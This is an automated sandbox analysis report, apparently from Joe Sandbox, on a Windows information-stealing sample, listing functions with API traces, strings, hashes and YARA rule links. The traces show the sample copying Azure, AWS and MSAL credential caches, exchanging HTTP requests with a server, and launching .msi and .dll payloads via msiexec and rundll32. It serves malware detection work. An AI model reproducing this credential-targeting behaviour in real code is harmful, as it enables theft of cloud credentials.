                                                                                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                                                          • String ID:
                                                                                          • API String ID: 1973479514-0
                                                                                          • Opcode ID: 7681f62c76a153f68e55b198b31b4bdcb046fd2ab64b5a65ba49cfbffb3ed154
                                                                                          • Instruction ID: ed6c437cbd46477d92e2fdf931dfcacd4144c719bc88927133304dc8b30d11c2
                                                                                          • Opcode Fuzzy Hash: 7681f62c76a153f68e55b198b31b4bdcb046fd2ab64b5a65ba49cfbffb3ed154
                                                                                          • Instruction Fuzzy Hash: 25E1A271901108ABCB14EBA0DC9AEEE7339AF54314F50415EF507B30A1DF786E99CB6A
                                                                                          Function 00414850 Relevance: 30.1, APIs: 10, Strings: 10, Instructions: 119stringCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 00414867
                                                                                            • Part of subcall function 00418880: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 004188AB
                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 00414890
                                                                                          • lstrcat.KERNEL32(?,\.azure\), ref: 004148AD
                                                                                            • Part of subcall function 004143F0: wsprintfA.USER32 ref: 0041440C
                                                                                            • Part of subcall function 004143F0: FindFirstFileA.KERNEL32(?,?), ref: 00414423
                                                                                          • memset.MSVCRT ref: 004148F3
                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 0041491C
                                                                                          • lstrcat.KERNEL32(?,\.aws\), ref: 00414939
                                                                                            • Part of subcall function 004143F0: StrCmpCA.SHLWAPI(?,00420FAC), ref: 00414451
                                                                                            • Part of subcall function 004143F0: StrCmpCA.SHLWAPI(?,00420FB0), ref: 00414467
                                                                                            • Part of subcall function 004143F0: FindNextFileA.KERNEL32(000000FF,?), ref: 0041465D
                                                                                            • Part of subcall function 004143F0: FindClose.KERNEL32(000000FF), ref: 00414672
                                                                                          • memset.MSVCRT ref: 0041497F
                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 004149A8
                                                                                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 004149C5
                                                                                            • Part of subcall function 004143F0: wsprintfA.USER32 ref: 00414490
                                                                                            • Part of subcall function 004143F0: StrCmpCA.SHLWAPI(?,004208BA), ref: 004144A5
                                                                                            • Part of subcall function 004143F0: wsprintfA.USER32 ref: 004144C2
                                                                                            • Part of subcall function 004143F0: PathMatchSpecA.SHLWAPI(?,?), ref: 004144FE
                                                                                            • Part of subcall function 004143F0: lstrcat.KERNEL32(?,0081C728), ref: 0041452A
                                                                                            • Part of subcall function 004143F0: lstrcat.KERNEL32(?,00420FC8), ref: 0041453C
                                                                                            • Part of subcall function 004143F0: lstrcat.KERNEL32(?,?), ref: 00414550
                                                                                            • Part of subcall function 004143F0: lstrcat.KERNEL32(?,00420FCC), ref: 00414562
                                                                                            • Part of subcall function 004143F0: lstrcat.KERNEL32(?,?), ref: 00414576
                                                                                            • Part of subcall function 004143F0: CopyFileA.KERNEL32(?,?,00000001), ref: 0041458C
                                                                                            • Part of subcall function 004143F0: DeleteFileA.KERNEL32(?), ref: 00414611
                                                                                          • memset.MSVCRT ref: 00414A0B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                          • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$Z\A$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                          • API String ID: 4017274736-156850865
                                                                                          • Opcode ID: 1e14282d3068892ecfd8ef1a9898795cb333a13778d9e0958f534f87ee8c2e99
                                                                                          • Instruction ID: 646ecaa1659512b06866923d8f1ff883aab6ee332b32f164b7e7d78f354b44b8
                                                                                          • Opcode Fuzzy Hash: 1e14282d3068892ecfd8ef1a9898795cb333a13778d9e0958f534f87ee8c2e99
                                                                                          • Instruction Fuzzy Hash: C741FC75A4021867CB20F760EC4BFDD773C5B54704F404459B64AA60D2EEFC57C98BAA
                                                                                          Function 004048D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 2335 4048d0-404992 call 41a170 call 404800 call 41a110 * 5 InternetOpenA StrCmpCA 2350 404994 2335->2350 2351 40499b-40499f 2335->2351 2350->2351 2352 4049a5-404b1d call 418600 call 41a2f0 call 41a270 call 41a1d0 * 2 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a2f0 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a2f0 call 41a270 call 41a1d0 * 2 InternetConnectA 2351->2352 2353 404f1b-404f43 InternetCloseHandle call 41a4a0 call 409b10 2351->2353 2352->2353 2439 404b23-404b27 2352->2439 2363 404f82-404ff2 call 418430 * 2 call 41a170 call 41a1d0 * 8 2353->2363 2364 404f45-404f7d call 41a1f0 call 41a380 call 41a270 call 41a1d0 2353->2364 2364->2363 2440 404b35 2439->2440 2441 404b29-404b33 2439->2441 2442 404b3f-404b72 HttpOpenRequestA 2440->2442 2441->2442 2443 404b78-404e78 call 41a380 call 41a270 call 41a1d0 call 41a2f0 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a2f0 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a2f0 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a2f0 call 41a270 call 41a1d0 call 41a110 call 41a2f0 * 2 call 41a270 call 41a1d0 * 2 call 41a4a0 lstrlenA call 41a4a0 * 2 lstrlenA call 41a4a0 HttpSendRequestA 2442->2443 2444 404f0e-404f15 InternetCloseHandle 2442->2444 2555 404e82-404eac InternetReadFile 2443->2555 2444->2353 2556 404eb7-404f09 InternetCloseHandle call 41a1d0 2555->2556 2557 404eae-404eb5 2555->2557 2556->2444 2557->2556 2558 404eb9-404ef7 call 41a380 call 41a270 call 41a1d0 2557->2558 2558->2555
                                                                                          APIs
                                                                                            • Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6
                                                                                            • Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 0040483A
                                                                                            • Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 00404851
                                                                                            • Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 00404868
                                                                                            • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                                                                            • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404965
                                                                                          • StrCmpCA.SHLWAPI(?,0081C7C8), ref: 0040498A
                                                                                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404B0A
                                                                                          • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DC3,00000000,?,?,00000000,?,",00000000,?,0081C7E8), ref: 00404E38
                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E54
                                                                                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E68
                                                                                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E99
                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00404EFD
                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00404F15
                                                                                          • HttpOpenRequestA.WININET(00000000,0081C648,?,0081BC80,00000000,00000000,00400100,00000000), ref: 00404B65
                                                                                            • Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
                                                                                            • Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
                                                                                            • Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2
                                                                                            • Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5
                                                                                            • Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
                                                                                            • Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352
                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00404F1F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                                                          • String ID: "$"$------$------$------
                                                                                          • API String ID: 460715078-2180234286
                                                                                          • Opcode ID: e8e3ac639a180a2193462cdd616153861071622b371d0a8d328dc4e5da759854
                                                                                          • Instruction ID: 96828d9d4da3c69e3e13a7d192eb2c0d5cb14303612463eff3b0a86b38ab5adb
                                                                                          • Opcode Fuzzy Hash: e8e3ac639a180a2193462cdd616153861071622b371d0a8d328dc4e5da759854
                                                                                          • Instruction Fuzzy Hash: 7B124E71912118AACB14EB91DC96FEEB339AF14314F50419EF50662091EF782F98CF6A
                                                                                          Function 00417DC0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                          • RegOpenKeyExA.KERNEL32(00000000,00818B78,00000000,00020019,00000000,004205A6), ref: 00417E44
                                                                                          • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00417EC6
                                                                                          • wsprintfA.USER32 ref: 00417EF9
                                                                                          • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00417F1B
                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00417F2C
                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00417F39
                                                                                            • Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseOpenlstrcpy$Enumwsprintf
                                                                                          • String ID: - $%s\%s$?
                                                                                          • API String ID: 3246050789-3278919252
                                                                                          • Opcode ID: 387138a2acaf9047d5f238e00edebe8a78cba1fcf6441e48f5509685d7ffdd98
                                                                                          • Instruction ID: 7e933c005afce5063b6ac28d37290dd0de40035e7daa9b78ce1efab2f7c43410
                                                                                          • Opcode Fuzzy Hash: 387138a2acaf9047d5f238e00edebe8a78cba1fcf6441e48f5509685d7ffdd98
                                                                                          • Instruction Fuzzy Hash: 3581197191111CABDB28DB54CC85FEAB7B9BF08314F0082D9E10AA6190DF756BC9CFA5
                                                                                          Function 004062D0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6
                                                                                            • Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 0040483A
                                                                                            • Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 00404851
                                                                                            • Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 00404868
                                                                                            • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                                                                            • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                          • InternetOpenA.WININET(00420DE6,00000001,00000000,00000000,00000000), ref: 00406331
                                                                                          • StrCmpCA.SHLWAPI(?,0081C7C8), ref: 00406353
                                                                                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
                                                                                          • HttpOpenRequestA.WININET(00000000,GET,?,0081BC80,00000000,00000000,00400100,00000000), ref: 004063D5
                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
                                                                                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
                                                                                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0040644D
                                                                                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004064BD
                                                                                          • InternetCloseHandle.WININET(00000000), ref: 0040653F
                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00406549
                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00406553
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                                                          • String ID: ERROR$ERROR$GET
                                                                                          • API String ID: 3749127164-2509457195
                                                                                          • Opcode ID: f3b98097e5e0f384b1902342b99ad1993feda62f21dbc400c84d5a874d7a36bf
                                                                                          • Instruction ID: cbac5eee591d607aa173065357eefb87c001816e051c1cde1c99a9b9dc38779b
                                                                                          • Opcode Fuzzy Hash: f3b98097e5e0f384b1902342b99ad1993feda62f21dbc400c84d5a874d7a36bf
                                                                                          • Instruction Fuzzy Hash: AA719F71A00218EBDB24DFA0DC49FEEB775AF44704F1080AAF50A6B1D0DBB86A85CF55
                                                                                          Function 00414FF0 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0041A1F0: lstrlenA.KERNEL32(00000000,?,?,00415634,00420AC3,00420AC2,?,?,004165B6,00000000,?,00816A50,?,004210DC,?,00000000), ref: 0041A1FB
                                                                                            • Part of subcall function 0041A1F0: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A255
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415124
                                                                                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415181
                                                                                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415337
                                                                                            • Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6
                                                                                            • Part of subcall function 00414CD0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414D08
                                                                                            • Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5
                                                                                            • Part of subcall function 00414DA0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414DF8
                                                                                            • Part of subcall function 00414DA0: lstrlenA.KERNEL32(00000000), ref: 00414E0F
                                                                                            • Part of subcall function 00414DA0: StrStrA.SHLWAPI(00000000,00000000), ref: 00414E44
                                                                                            • Part of subcall function 00414DA0: lstrlenA.KERNEL32(00000000), ref: 00414E63
                                                                                            • Part of subcall function 00414DA0: strtok.MSVCRT ref: 00414E7E
                                                                                            • Part of subcall function 00414DA0: lstrlenA.KERNEL32(00000000), ref: 00414E8E
                                                                                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041526B
                                                                                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415420
                                                                                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004154EC
                                                                                          • Sleep.KERNEL32(0000EA60), ref: 004154FB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcpylstrlen$Sleepstrtok
                                                                                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                          • API String ID: 3630751533-2791005934
                                                                                          • Opcode ID: 53c0d387d700226d11633ba140bdf5a28658bb722894504da175286b8ed3d870
                                                                                          • Instruction ID: 47717806d02ab2b23084bb80b202f8eeb65c1f88a6bcad5d58c416e3f74fe27f
                                                                                          • Opcode Fuzzy Hash: 53c0d387d700226d11633ba140bdf5a28658bb722894504da175286b8ed3d870
                                                                                          • Instruction Fuzzy Hash: 1FE1A671901104AACB14FBB1EC57EED7339AF94314F40852EB40666192EF3C6B9DCB9A
                                                                                          Function 00412940 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                          • ShellExecuteEx.SHELL32(0000003C), ref: 00412CD5
                                                                                          • ShellExecuteEx.SHELL32(0000003C), ref: 00412E6D
                                                                                          • ShellExecuteEx.SHELL32(0000003C), ref: 00412FFA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExecuteShell$lstrcpy
                                                                                          • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                                                                          • API String ID: 2507796910-3625054190
                                                                                          • Opcode ID: 1269a2963d8ca731cd15ea21f395861ee9b80a8739dce938bb9cd153d85dca40
                                                                                          • Instruction ID: f1658c825a9884a12c356146fd8d4c6d848a61a952cd10e5c69c9f5a52c1d3c9
                                                                                          • Opcode Fuzzy Hash: 1269a2963d8ca731cd15ea21f395861ee9b80a8739dce938bb9cd153d85dca40
                                                                                          • Instruction Fuzzy Hash: FA121F71811108AACB14FBA1DC96FDEB778AF14314F40415EF40666192EF782BD9CFAA
                                                                                          Function 00401310 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 00401327
                                                                                            • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                                                                            • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                                                                            • Part of subcall function 004012A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                                                                            • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
